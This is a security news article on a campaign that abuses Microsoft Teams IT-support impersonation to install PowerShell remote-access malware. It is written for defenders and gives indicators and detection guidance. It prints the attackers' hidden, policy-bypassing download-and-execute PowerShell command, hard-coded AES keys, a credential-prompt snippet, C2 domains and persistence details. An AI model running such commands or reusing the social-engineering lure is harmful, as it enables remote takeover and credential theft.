Microsoft Teams Abused in Cyberattack Delivering PowerShell-Based Remote Access Malware

Microsoft Teams Abused in Cyberattack Delivering PowerShell-Based Remote Access Malware

In a concerning development for enterprise security, cybercriminals have begun exploiting Microsoft Teams—long trusted as an internal messaging and collaboration tool—to deliver PowerShell-based malware and gain unauthorized remote access to Windows systems.

By impersonating IT support personnel and leveraging social engineering, these threat actors bypass traditional email filters and network defenses, striking directly at deep-seated user trust in everyday collaboration platforms.

Since its launch in 2017, Microsoft Teams has become indispensable for organizations worldwide, handling chat, meetings, file sharing, and more.

Threat actors are now capitalizing on Teams’ ubiquity by creating new or compromising existing Teams tenants, then initiating voice or chat sessions under the guise of “IT SUPPORT,” “Help Desk,” or custom names embellished with checkmark emojis to convey legitimacy.

These accounts typically rely on Microsoft’s onmicrosoft.com domain and generic prefixes such as “admin” or “supportbotit,” signaling automated or bulk account creation.

Once a Teams session is accepted—often framed as a routine performance check or maintenance call—the attacker directs the victim to install remote access tools like QuickAssist or AnyDesk.

Through these legitimate utilities, the adversary then takes control of the endpoint. Unlike earlier campaigns linked to BlackBasta ransomware, which began with mass email blasts before a Teams follow-up, some recent attacks skip email entirely, initiating directly via Teams. These variations suggest multiple actor groups or evolving tactics.

After establishing remote control, attackers execute a PowerShell payload delivered through a command such as:

powershellpowershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command "Invoke-RestMethod -Uri https://audiorealteak.com/payload/build.ps1/iex"

This multi-stage script provides credential theft, persistence, system reconnaissance, and remote code execution.

Early in the script, unique hard-coded AES parameters—$iv = "&9*zS7LY%ZN1thfI" and $key = "123456789012345678901234r0hollah"—allow defenders to pivot investigations and link to previous scripts attributed to the financially motivated EncryptHub group, also known as Water Gamayun or LARVA-208.

OSINT reporting ties this group to zero-day exploitation of CVE-2025-26633 (MSC EvilTwin) and bespoke malware families including SilentPrism and DarkWisp.

Upon execution, the malware enforces single-instance operation via a global mutex:

powershell$AppId = "62088a7b-ae9f-2333-77a-6e9c921cb48e"
$script:SingleInstanceEvent = New-Object Threading.EventWaitHandle $true, …

It then compiles and injects C# to call RtlSetProcessIsCritical from ntdll.dll, marking the PowerShell process as critical so that termination triggers a system crash, complicating incident response.

A SystemInfo function gathers host details—public IP, hardware UUID, operating system data—formats it as JSON, encrypts it with AES, and exfiltrates to the attacker’s C2 endpoint.

For credential theft, the script invokes a native Windows credential prompt:

powershell$D = $Host.UI.PromptForCredential("Need credentials", …)

This seamless integration with the Windows UI lowers user suspicion. Retrieved credentials are saved to info.txt under the user’s AppData directory.

Persistence is achieved by first attempting to register a scheduled task named “Google LLC Updater” to run the payload at logon, then falling back to a registry Run key if the task registration fails.

Both methods fetch the next-stage script from a backup domain (https://cjhsbam[.]com/payload/runner.ps1), ensuring resilience against takedown attempts.

All C2 communications are encrypted using the hard-coded AES key and IV, sent to https://audiorealtek[.]com/, with responses decrypted and executed as PowerShell jobs.

Enterprises using Permiso can leverage built-in detections such as P0_M365_TEAMS_CHAT_CREATED_BY_SUSPICIOUS_EXTERNAL_USER_1 and P0_M365_TEAMS_CHAT_MEMBER_NAME_SUSPICIOUS_CHARACTER_1 to identify suspicious Teams interactions.

As threat actors continue to pivot to collaboration platforms, organizations must reinforce security awareness around external chats and voice calls, enforce strict tenant-allow/block lists, and monitor for anomalous account creations within Microsoft Teams.

Proactive detection of hard-coded cryptographic artifacts and unusual process protections in PowerShell scripts can provide crucial early warning of these evolving social engineering threats.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.



Source link